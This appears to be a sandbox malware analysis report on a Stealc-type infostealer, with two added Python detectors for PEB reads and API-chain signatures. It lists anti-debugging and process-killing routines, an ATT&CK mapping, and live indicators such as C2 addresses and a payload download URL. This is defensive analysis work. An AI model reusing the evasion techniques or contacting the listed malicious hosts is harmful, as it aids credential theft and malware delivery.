                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | API call chain: ExitProcess graph end node | graph_3-34046
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_00404980 VirtualProtect 00000000,00000004,00000100,? 3_2_00404980
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h] 0_2_0042FE5F
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00AF9893 push dword ptr fs:[00000030h] 0_2_00AF9893
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_025200C6 mov eax, dword ptr fs:[00000030h] 0_2_025200C6
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024F092B mov eax, dword ptr fs:[00000030h] 0_2_024F092B
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024F0D90 mov eax, dword ptr fs:[00000030h] 0_2_024F0D90
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_004263C0 mov eax, dword ptr fs:[00000030h] 3_2_004263C0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092A99B push dword ptr fs:[00000030h] 3_2_0092A99B
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A6627 mov eax, dword ptr fs:[00000030h] 3_2_024A6627
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0248092B mov eax, dword ptr fs:[00000030h] 3_2_0248092B
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02480D90 mov eax, dword ptr fs:[00000030h] 3_2_02480D90
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0251A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0251A63A
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0250073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0250073A
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024FFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_024FFB78
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_025008CD SetUnhandledExceptionFilter,0_2_025008CD
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A9A10 SetUnhandledExceptionFilter,3_2_024A9A10
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A7E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_024A7E31
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_024A784F
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Memory protected: page guard
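The "mov eax, dword ptr fs:[00000030h]" and "push dword ptr fs:[00000030h]" entries above are how the report substantiates "Contains functionality to read the PEB": on 32-bit Windows FS:[0] is the TEB and TEB+0x30 holds the PEB pointer, from which PEB.BeingDebugged (offset 2) and NtGlobalFlag are read without calling IsDebuggerPresent. The Python below is an added example, not code from the report or the sample, that finds those instruction encodings in a raw code buffer so the same finding can be reproduced on a dumped section. It covers the short moffs32 form (64 A1), the ModRM form into any register (64 8B /r), the push form (64 FF /6) and the two-step TEB-self-pointer variant (fs:[18h] then [eax+30h]); the code buffer is constructed for the example.

```python
"""Locate 32-bit x86 reads of the PEB through the FS segment (added example)."""
import re
from typing import NamedTuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 0x64 is the FS segment-override prefix. TEB+0x30 = ProcessEnvironmentBlock,
# TEB+0x18 = the TEB's own linear address (used by the two-instruction form).
# ModRM mod=00 rm=101 selects a bare disp32, so the middle byte encodes only the
# destination register: 0x05 + (reg << 3).
PATTERNS = [
    (rb"\x64\xA1\x30\x00\x00\x00",                                         # 64 A1 disp32
     lambda m: "mov eax, dword ptr fs:[30h]"),
    (rb"\x64\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00",   # 64 8B /r disp32
     lambda m: f"mov {REG32[(m.group(1)[0] >> 3) & 7]}, dword ptr fs:[30h]"),
    (rb"\x64\xFF\x35\x30\x00\x00\x00",                                     # 64 FF /6 disp32
     lambda m: "push dword ptr fs:[30h]"),
    # mov eax, fs:[18h] ; ... ; mov r32, [eax+30h]   (ModRM mod=01 rm=000, disp8=0x30)
    (rb"\x64\xA1\x18\x00\x00\x00.{0,6}?\x8B([\x40\x48\x50\x58\x60\x68\x70\x78])\x30",
     lambda m: f"mov eax, fs:[18h] ; mov {REG32[(m.group(1)[0] >> 3) & 7]}, [eax+30h]"),
]


class Hit(NamedTuple):
    offset: int
    mnemonic: str


def find_peb_reads(code: bytes) -> list[Hit]:
    """Return every PEB read found in code, ordered by offset."""
    hits = []
    for pattern, describe in PATTERNS:
        for m in re.finditer(pattern, code, re.DOTALL):
            hits.append(Hit(m.start(), describe(m)))
    return sorted(hits)


# Constructed code fragment (not taken from the sample). The fs:[0] read at the
# end is the SEH chain head and must not be reported.
SAMPLE_CODE = (
    b"\x90\x90"
    + b"\x64\xA1\x30\x00\x00\x00"          # mov eax, fs:[30h]
    + b"\x8B\x40\x02"                      # mov eax, [eax+2]    (PEB.BeingDebugged)
    + b"\x64\x8B\x0D\x30\x00\x00\x00"      # mov ecx, fs:[30h]
    + b"\x64\xFF\x35\x30\x00\x00\x00"      # push dword ptr fs:[30h]
    + b"\x64\xA1\x18\x00\x00\x00"          # mov eax, fs:[18h]
    + b"\x8B\x40\x30"                      # mov eax, [eax+30h]
    + b"\x64\xA1\x00\x00\x00\x00"          # mov eax, fs:[0]     (not the PEB)
    + b"\xC3"                              # ret
)

if __name__ == "__main__":
    for hit in find_peb_reads(SAMPLE_CODE):
        print(f"+0x{hit.offset:04x}  {hit.mnemonic}")
```

This is a linear byte scan, not a disassembly, so a matching byte run inside an immediate or a data blob is also reported; confirm each hit at an instruction boundary before counting it. 64-bit code reaches the PEB through gs:[60h] instead and is not covered here.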

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: 8DF0.tmp.exe PID: 1280, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_004246C0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A4897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,3_2_024A4897
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A4927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_024A4927
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Process created: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe"
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0041077B cpuid 0_2_0041077B
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,0_2_004351C0
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_0043B2CD
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_0043B282
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_0043B368
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,0_2_0043B645
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,0_2_0043B875
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_00434DCD
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0252B271
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_02525034
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,0_2_02525427
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_0252B4E9
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_0252B534
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: EnumSystemLocalesW,0_2_0252B5CF
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,0_2_0252BADC
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0252BBA9
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,0_2_0252B8A3
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,0_2_0252B8AC
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0252B9D5
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_024A2F67
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_004229E0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A2E17 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_024A2E17
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                  Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe
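The call chains the report prints for 8DF0.tmp.exe are the most reusable part of this section: the CreateToolhelp32Snapshot / Process32First / Process32Next / StrCmpCA / OpenProcess / TerminateProcess routines under this heading (process enumeration with a name compare followed by a kill) and the FindFirstFileA / CopyFileA / DeleteFileA / FindNextFileA / FindClose loops listed earlier (walk a directory, copy each matching file out, remove the copy). The Python below is an added example, not part of the report or the Stealc sample, that parses report-style "Code function:" lines and matches them against ordered API subsequences, so the same heuristics can be re-run over another report or an API trace. The signature names are this example's own; the sample lines are copied from the entries above.

```python
"""Ordered API-chain signatures over Joe Sandbox 'Code function:' lines (added example)."""
import re

ID_RE = re.compile(r"\b\d+_\d+_[0-9A-Fa-f]{8}\b")   # report function ids, e.g. 3_2_004246C0

# Each signature is an ordered subsequence; any calls may sit between its elements.
SIGNATURES = {
    "process-enumeration": ["CreateToolhelp32Snapshot", "Process32First", "Process32Next"],
    "process-kill-by-name": ["CreateToolhelp32Snapshot", "Process32First", "StrCmpCA",
                             "OpenProcess", "TerminateProcess"],
    "file-harvest-loop": ["FindFirstFileA", "CopyFileA", "DeleteFileA", "FindNextFileA", "FindClose"],
    "crt-debugger-check": ["IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"],
}


def parse_chain(line: str) -> tuple[str, list[str]]:
    """Split a 'Code function:' line into (function id, list of API names in call order)."""
    _, _, body = line.partition("Code function:")
    ids = ID_RE.findall(body)
    fn = ids[-1] if ids else "?"                       # the id is repeated at the end of the line
    apis = [t.strip() for t in ID_RE.sub(" ", body).split(",")]
    return fn, [a for a in apis if a]


def is_subsequence(calls: list[str], sig: list[str]) -> bool:
    """True when every element of sig occurs in calls in that order, gaps allowed."""
    it = iter(calls)                                   # shared iterator keeps the order constraint
    return all(any(c == want for c in it) for want in sig)


def classify(line: str) -> tuple[str, list[str]]:
    fn, apis = parse_chain(line)
    return fn, [name for name, sig in SIGNATURES.items() if is_subsequence(apis, sig)]


# Lines copied from the report above.
REPORT_LINES = [
    "Code function: 3_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,"
    "OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_004246C0",
    "Code function: 3_2_024A4897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,"
    "Process32Next,CloseHandle,3_2_024A4897",
    "Code function: 3_2_0249E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,"
    "StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,"
    "lstrlen,lstrcpy,3_2_0249E0B7",
    "Code function: 3_2_0249D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,"
    "lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0249D8A7",
    "Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,"
    "UnhandledExceptionFilter,0_2_0042A3D3",
]


def classify_all(lines: list[str] = REPORT_LINES) -> dict[str, list[str]]:
    """Map each function id to the signatures its chain satisfies."""
    return dict(classify(line) for line in lines)


if __name__ == "__main__":
    for fn, names in classify_all().items():
        print(fn, ", ".join(names) or "-")
```

Two caveats when reading the matches. The kill signature only says that a process-name compare is followed by OpenProcess/TerminateProcess; the report does not list the target names, so it cannot tell which processes the routine is after. The IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter triple is also what the MSVC runtime's own security-failure handler emits, which is why it appears twice in the packer stage (0x0042A3D3 and 0x0251A63A); on its own it is weak evidence of a deliberate debugger check.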

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.8DF0.tmp.exe.24c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.8DF0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.8DF0.tmp.exe.24c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.8DF0.tmp.exe.2480e67.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.8DF0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 8DF0.tmp.exe PID: 1280, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
Source: Yara match, File source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.3.8DF0.tmp.exe.24c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.8DF0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.3.8DF0.tmp.exe.24c0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.8DF0.tmp.exe.2480e67.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.8DF0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 8DF0.tmp.exe PID: 1280, type: MEMORYSTR
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe, Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe, Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe, Code function: 0_2_02511B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02511B33
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe, Code function: 0_2_02510E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02510E5D
MITRE ATT&CK Matrix

Techniques are listed per tactic in the order they appear in the matrix; the number in parentheses is the signature count shown next to the technique in the matrix.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Native API (2), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading (1), Create Account (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: DLL Side-Loading (1), Process Injection (111), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (22), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (1), Process Injection (111), HTML Smuggling, Dynamic API Resolution
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (44), Query Registry (1), Security Software Discovery (131), Virtualization/Sandbox Evasion (1), Process Discovery (12), Application Window Discovery (1), System Owner/User Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Archive Collected Data (1), Clipboard Data (3), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Ingress Tool Transfer (12), Encrypted Channel (21), Non-Application Layer Protocol (2), Application Layer Protocol (113), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Antivirus detection, submitted sample

Source | Detection | Scanner
ssB9bjDQPf.exe | 45% | ReversingLabs
ssB9bjDQPf.exe | 100% | Joe Sandbox ML

Antivirus detection, dropped files

Source | Detection | Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | 45% | ReversingLabs
C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | 45% | ReversingLabs

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs

Source | Detection | Scanner | Label
https://post-to-me.com/track_prt.php?sub=0&cc=DE_ | 100% | Avira URL Cloud | malware
http://92.255.57.89/45c616e921a794b8.php | 100% | Avira URL Cloud | malware
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE | 0% | Avira URL Cloud | safe
http://92.255.57.89 | 100% | Avira URL Cloud | malware
http://92.255.57.89=8P | 0% | Avira URL Cloud | safe
http://176.113.115.19/ScreenUpdateSync.exex | 0% | Avira URL Cloud | safe
http://92.255.57.89/T | 100% | Avira URL Cloud | malware
http://92.255.57.89/ | 100% | Avira URL Cloud | malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEu | 100% | Avira URL Cloud | malware
http://92.255.57.89/A | 100% | Avira URL Cloud | malware
http://176.113.115.19/ScreenUpdateSync.exe | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
post-to-me.com | 172.67.179.207 | true | false | (none) | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://92.255.57.89/45c616e921a794b8.php | true | Avira URL Cloud: malware | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | (none) | high
http://92.255.57.89/ | true | Avira URL Cloud: malware | unknown

URLs found in memory or binary data

Name | Source | Malicious | Antivirus Detection | Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE | ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | (none) | high
https://post-to-me.com/track_prt.php?sub=0&cc=DE_ | ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE | ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://92.255.57.89 | 8DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://post-to-me.com/track_prt.php?sub= | ssB9bjDQPf.exe | false | (none) | high
http://92.255.57.89=8P | 8DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://92.255.57.89/T | 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEu | ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://176.113.115.19/ScreenUpdateSync.exex | ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
